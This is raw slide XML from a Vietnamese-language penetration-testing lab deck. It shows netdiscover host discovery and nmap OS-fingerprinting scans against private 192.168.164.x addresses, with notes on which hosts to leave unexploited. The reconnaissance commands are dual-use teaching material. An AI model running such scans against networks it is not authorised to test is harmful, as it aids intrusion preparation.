              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> eth0 qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1"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netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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–I eth0 –r 192.168.164.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D321F6A5-998C-F643-751F-D1A2F01B1546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="1652369"/>
            <a:ext cx="8185150" cy="3500668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22675900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3B1AA-8689-47E2-F748-263C6258DC7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3E7B19-F78C-89E8-8BBF-5DF6EFE7858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0C333507-F382-D263-6EE8-F72E9A1FC55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73</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A6D474-06DE-3D63-267D-97D35FAD01F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="266700"/>
            <a:ext cx="8915400" cy="59759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200" b="1"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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–O 192.168.164.1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7BA3F20-36A1-C20B-DE32-76108E7AC24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="1485901"/>
            <a:ext cx="3276600" cy="2157000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> :</a:t>
            </a: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máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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Nên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>này</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C5C973E7-0808-145E-FFF6-8941889A9B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1043622"/>
            <a:ext cx="5680413" cy="3947476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37896513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02543-C3C6-84B4-2EDC-7B59F31EF6C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8A6E293-3347-0089-0C1B-1821608CBE5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46128D2B-DDCE-2879-9532-17AACFE9BA14}"/>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74</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE613E3-033F-B546-3043-36BDE24C63E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="266700"/>
            <a:ext cx="8915400" cy="59759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200" b="1"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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–O 192.168.164.2</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{497D2B5A-3AA7-9C02-9DDD-D8508831501C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854700" y="1485900"/>
            <a:ext cx="3276600" cy="2157000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> :</a:t>
            </a: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máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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Nên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>này</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4D5F163B-8E60-5A19-6251-7B9D93BCF3C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1240823"/>
            <a:ext cx="5570294" cy="3870951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114873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02B33-392F-6267-48F5-71A82D576A0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9B2FEC9-EC49-E779-C062-42912C970E3B}"/>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6DC153A3-BF81-FF62-B3B0-C984350B086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75</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B039F3D-2C7B-4845-BC97-586C270156DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="266700"/>
            <a:ext cx="8915400" cy="59759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200" b="1"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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–O 192.168.164.254</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC0DE42-7149-ED78-DE32-ADA3E283E061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="1485900"/>
            <a:ext cx="3276600" cy="2157000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> :</a:t>
            </a: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máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>VMware</a:t>
            </a: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Nên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>này</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6F115C5-8EE5-CA63-9EDC-7561398EF0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1238133"/>
            <a:ext cx="5562600" cy="4222867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1811879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FBA90-81E6-6137-F87E-319C5E2B97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1DEDD11-1964-AFED-F8B1-A61405BB336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777A8D87-803E-B841-CD48-B7DDE71FA5F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76</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6201624-6024-3FB9-07A7-62DB8CDB947F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="266700"/>
            <a:ext cx="8915400" cy="59759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200" b="1"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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–O 192.168.164.132</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE90D7B8-6D07-3863-5AA8-80AED78A05E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140450" y="1496871"/>
            <a:ext cx="3276600" cy="2721257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>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Chạy</a:t>
            </a:r>
            <a:r>
